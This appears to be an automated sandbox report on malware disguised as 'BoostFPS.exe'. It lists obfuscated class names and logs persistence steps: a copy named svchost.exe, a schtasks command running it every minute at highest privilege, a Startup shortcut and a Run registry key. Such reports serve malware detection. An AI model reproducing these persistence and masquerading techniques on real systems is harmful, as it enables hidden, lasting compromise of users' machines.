                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | High entropy of concatenated method names: 'TKwaZYczhZHeBkBjnC4FAoU1v6oSYDF5GuLQljhkge5uI2tFXsXoeVQTeYMP6QThAP9cnTqcITBz', 'GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR', '_8EDhV4r1m7ktQq4wQR3GzHqoSSy9jPDSM5qcZqWUVNQVP2yHPxCPV4qBisoqGQn3hPC4t0y2pPaE', 'yTPMF1iSmPRXuB72iFyBMmvVRxKRIk4nSoc9ux8matyalFmlvtS5KcQxAU5xsuSBrEG1f1NvolnF', 'UkmrxZXoVvHGSMGrciskGfNrY1Cl1cjtirYftIpYUvqGiFuiCUIEkmv6Q9fOWmqguYzYxC4IKbtr', '_4QG4gsJdGffwuq0L0kkGpUCrDdilwejzvTlcNpw2kcGK50CttEoy8lwAPt8MvWn5NORrjOwDQONb', '_7UhVED4iIc67RFsqbWeRiBO0nBAGIOEjIygEnOyqcNspHHxLOE9M8be4KmOxADoce37HKdvMctaB', 'bWMXJsCBt7jOLGkTUsnkg6yDt8xKZGhW1i7k8HVoLIwGuzsI22J1zcHROwWFNBv2qDzVvE4f3nx8', '_965r8GGj19n7G4kv0H', 'UsdMBU6FoXifoBBCSC'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, CqayRAcK1MmI849tGL0QQPnNglzRe3g697BQHLFaS9cFPuAktUnTuC.cs | High entropy of concatenated method names: 'QvDyedJdVmV89O8MG5MqZbBxir79ANlQKelW97fRwFaP9Rl3tRSoFk', 'uXDa0StEMg6JtXVdMk5RW6wBVNWui0qCaRxcp0rxYfSjl3hB9GoE42', 'NN6vwYeEPVI2lX6BDH2Wf6Tc1gwVHk13PllyZgM9yajpNtsa6YFXM2', 'J7K01GgNoHQzps07B0', 'G5fPy8yAbA8cMwEkEe', 'vb5mCm1nJdZsjrscjZ', 'mo0sVWQNNC1jWRH0F6', 'gnBFijogF8HOO7ZjOO', '_1GZM1YxV85WBqfYxth', 'Ng456IfZauO7u7ncHk'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, b43LsePgKro8PAKsdWFwSRgXeS.cs | High entropy of concatenated method names: 'pJhO7lpTUwXiqq6Mnv4wBV39ZravpHk', 'tUwF4Orj4rPSIM9cvZUuxx33o9AaMtI', 'LxlIVpQL005ShxlFHTbw4U453EmHFdr', 'hqDJFOBBQNdYEafop5fisn27kKFznbF'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, dJGrFzZRnm6nhZzk5c7khNtk9BuO2lukaMR55NFFW.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_00dL45P1ktComGL5U4dAnLBZZNpISoM', 'Rsb29rsd4Cjz1zlP1rLkiSBao2paROq', '_2jniG1mTDJhcQv68bhchvVTi1xAlk4j', 'X8UGiLhrGAgGHfQ0k4CqAHvnqfeSw97'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.cs | High entropy of concatenated method names: 'Bqr9IApmOTP4nl7Vt7e9zCVwOIzyM1affYfK', 'ePFHuDJi8YM5vgvRtm4d8P3bIVS5ZoRQufO5', 'RDQeaHUygmLZ4XlSIQDW2JEoPsWqBfTJplew', 'XDTQpIlZmBdbgOxqPX6S59wFMtenm0S4ygPM', '_6NU4mk3vmSnGJ60tIcKynuFbayPh8B6MKfSR', 'Gzl9UVEXWKpfugyYZH8JHiZw7riCJHbIYGGx', 'yv237CSvGbeP3sVaYuovmEocUT3HDMM60hip', 'jMdrQxh8jarANIUZWoYIkVBWPqR9sHCVcH85', 'hRwg9qRUbT20SboWQNk9EHmjP589muWAfD8V', '_2KGgiMKOtakioIjRKfHvGo5radn0LNEq0JBU'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.cs | High entropy of concatenated method names: 'KUGRFX7NzbXI3dF0wrdURHUtG0zaBv88MtAS', 'tOO2Z8qOEgWLfHluOXChWdvCxwZiRsOYCgklHDjJBFONK6jcyMxSe8mQaa', 'd9waWOcLbOPbOe7dEsf7sOhuxOMofzlxq6uBRjro1Ofq4CfDh2t003LpId', 'mguuZjrCd716Ke7x2VaTOvT9C267EXZyAd9iIiRhKZgFpLUCSZFb0OMsBr', 'KFKupFPsRoJOg7guPRcWmBr92jiEr24qAscLgapCeBrOyl3xdjl5qIJDiHuKuJuaLwZmH2hAbbEuo5WeCPH3KoMVf5Q'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 8IQB900HXYRJQlSr78JTfor2tc.cs | High entropy of concatenated method names: 'TKQFizhs2lVNjSAlf0Q6tXZS9v', 'GLvUvE5Lbzlydp5PY3jqcSPc2C', 'UGiY4f3pvEofg6Iulz9u3CYCfe', 'tsAJnLIXUMiQta7muY5V2eRXUJYTBobZmSC8woLmV1ABLMNiJKCx2FA7ILp', 'XgS9lV9wP0OGaskWn9Y4U2tdyyY0ScMgnWouvmgUBtf78ym6Hm0dmLmg6Bc', 'NCQJtvrYdEzQevyWWGgB99RksUoSpZE67tNLNlksT40uqOvu7xHCWbWxxrD', 'qSCmv1R3jGNemiDUTJ474IWiQCSfBTDKtnLSfE04Sqm5yTJvS7wcZPfnEX5', 'r4fxv6B01YN2ArbEBxeUYIRc0wVYyAE29pUS9HqR705MNSu9fieq70gGc8Q', 'JH4TehWKGyhxn5JmfBZY4DPaSj4jwTSOdvroJu197cOXlTXsXW3yP18w2P7', 'YBXKyVGqnUX5Mj4MuhZCDMMKfYCfR8W4TJapIts56pYaISM0WSIA8XRveMM'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, C3tzO69S7Io0iqQUFZ.cs | High entropy of concatenated method names: 'n9L1SiSEKnOJLPTxOX', 'EdBvOJPjc5U4FwQjZPHehC50grzSW4u0TEwsTvnjg', 'KvIjvXDwWu1qObxmvBuHAnLOlPZ5cVMT9DKAREzuB', 'TWEQgKKNlYxIV2sXjt3GXoQHItjA7DOEipgMvF6G8', '_6kBkFN74HE0ZoUbVwwgfs9Ac7Loe5XbCdg0hpnRMx'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | High entropy of concatenated method names: 'YLBldLktCgFxThvN3oxSQ7feTLXUeDESnntmrT7ODqPx', 'txd84qUAtgwYBo9hQ59Qx4WG76651dxKXzDgjQ4RQjNl', 'DFIl5zQJ9Msj8WXgFZlHlDi4yEdc04TaUxEaDb7Y7PxZ', 'RMTYoFcDRWXDbOJy8TYimVj3U1FCB7brlYSUefzw1g3a', 'NnvXBw8RFHbkMePGrLNQdXa5TAnrdnZu2QVIin3vo2mi', '_6nBIcXOrZOwCX0Qc7WU3lRESKofh470ADvsaGoaVdV97', 'C5FyNGPKc9mEwULry8gJ9d5YWdaA6qzxna3qRkyZaZBE', 'jfY0sMtntiNWfzbhmZ9M7BrBRw844THn8sm8wArbNBV4', 'vVaYHCq4glB5AHmXJ7Jtg5uBfww3j21bhxiAxnwh7PWb', '_4aDgrCBIP20LRSew2k3GkegkMNmpKebAwjrrBjmXFy4i'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, 7JvHuWPw1GACQFV6RkGOPBlb2yE8r5a5qayCygvYw9HkC6ls1bwfCuTp8eL7K7yAXlVdxclqrSk5bcvZT2QmhwOVf97ctC.cs | High entropy of concatenated method names: 'HTgL90ABMji8QHmbo3nJuM4cUcC0fXQjBtEKZexQI8EGW8SShhROfFbjk3KSm20q60evJLiweHt8kiQNONhRhYdkZzwFWr', '_1mBzvp4cKSuOZksJRJnqpOopSrVYJ83f8Sjc', 'pOndutOPfJ53dQtjcy1aV3cT75K6Si0zBS5C', '_9cYhnzdcVkH81UksXA1GBmOtmUpqremzL8pn', '_7j5fffhqLEYuO8KzIcszij2w6ldIu94YG4Fl6fx2CcVVUnTKZBHIi4pTaJ', 'YTL7nT9jYE47vjLOWFsGpQLCuJtclTzNf4E1iwxBMs6ipah79j1QamQskK', '_71MnawkND25UImg5RD8vnC6d9aHxHxZTuWVzhJnMTYaqXoxXTOiVmaKL8J', 'TJ1FZdlbjXCZFX1IPpa1c3qAKhddtgauOzJCNgYoI2Ir3AZqppeBPub0H9', 'tjgCwv0QJ4BVSD9kaFIeI8jz56aW67sB6nV49xAfgDpKCPWJXUHXeDMKYs', 'tJbvRiG4i7af79ROK8siEac83raDF0n1DsB9y8YDAkoFe1to0GVorRnfHV'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, fTao5gWD0t2iSxXg7i.cs | High entropy of concatenated method names: 'qI9aCiC0DxmzgxmHI0', 'cOuY6dyf6DfrDzWT3y', 'PLaqPXtPvSAygMwypD', '_1sn6RRw7e5kdfUFxZE', 'iVJBOz249xWFhoHIO5', 'YhnePqRO3hAfnGAzIS', 'p5KZLqACgdwca7gTXh', 'Q2ZPJVjtIoVG6rIKfV', 'iOyNtBPWFmH5jVtghW', 'IRWFiTmFGLsH6shGQN'
                  Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | High entropy of concatenated method names: 'TKwaZYczhZHeBkBjnC4FAoU1v6oSYDF5GuLQljhkge5uI2tFXsXoeVQTeYMP6QThAP9cnTqcITBz', 'GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR', '_8EDhV4r1m7ktQq4wQR3GzHqoSSy9jPDSM5qcZqWUVNQVP2yHPxCPV4qBisoqGQn3hPC4t0y2pPaE', 'yTPMF1iSmPRXuB72iFyBMmvVRxKRIk4nSoc9ux8matyalFmlvtS5KcQxAU5xsuSBrEG1f1NvolnF', 'UkmrxZXoVvHGSMGrciskGfNrY1Cl1cjtirYftIpYUvqGiFuiCUIEkmv6Q9fOWmqguYzYxC4IKbtr', '_4QG4gsJdGffwuq0L0kkGpUCrDdilwejzvTlcNpw2kcGK50CttEoy8lwAPt8MvWn5NORrjOwDQONb', '_7UhVED4iIc67RFsqbWeRiBO0nBAGIOEjIygEnOyqcNspHHxLOE9M8be4KmOxADoce37HKdvMctaB', 'bWMXJsCBt7jOLGkTUsnkg6yDt8xKZGhW1i7k8HVoLIwGuzsI22J1zcHROwWFNBv2qDzVvE4f3nx8', '_965r8GGj19n7G4kv0H', 'UsdMBU6FoXifoBBCSC'

                  Persistence and Installation Behavior

                  Source: C:\Users\user\Desktop\BoostFPS.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe

                  Boot Survival

                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\BoostFPS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
